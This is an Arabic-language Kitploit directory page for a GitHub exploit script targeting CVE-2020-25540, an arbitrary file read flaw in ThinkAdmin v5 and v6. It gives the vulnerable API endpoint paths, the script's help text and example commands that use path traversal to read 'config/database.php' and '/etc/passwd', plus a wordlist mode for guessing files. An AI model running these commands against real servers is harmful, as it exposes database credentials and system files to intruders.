Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-25540 — ThinkAdmin v5 v6 — استغلال ثغرة قراءة الملفات التعسفية، مع إمكانية تخصيص القاموس لشن هجوم القوة العمياء (Brute Force). | Kitploit
أدوات/GitHubGitHub/simonlee-hello/cve-2020-25540
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubsimonlee-hello/cve-2020-25540

CVE-2020-25540

ThinkAdmin v5 v6 — استغلال ثغرة قراءة الملفات التعسفية، مع إمكانية تخصيص القاموس لشن هجوم القوة العمياء (Brute Force).

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

cve-2020-25540

يُستخدم هذا السكربت لاستغلال ثغرة قراءة الملفات العشوائية في ThinkAdmin للإصدارين v5 وv6

==قد تختلف مسارات الواجهة بين الإصدارات المختلفة (بعضها مبني على تطوير ثانوي لـThinkAdmin الأصلي)==

  • واجهة النسخة الأصلية هي: /admin.html?s=admin/api.Update/get?/encode/xxxx
  • نسختي هذه (مبنية على تطوير ثانوي لأحد مشاريع الأموال) هي: /admin.html?s=admin/api.Update/read?encode=xxxx

الاستخدام الأساسي

root@kitploit:~
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
                         [-p PARALLEL]

通过 API 读取文件并获取响应

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标 IP 地址或域名
  -f FILE, --file FILE  要读取的文件路径
  -w WORDLIST, --wordlist WORDLIST
                        字典文件路径,提供多个文件路径或文件名
  -b BASE_PATH, --base-path BASE_PATH
                        基础路径,用于拼接字典文件中的路径
  -p PARALLEL, --parallel PARALLEL
                        并行线程数
root@kitploit:~
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10
تنزيل الأداة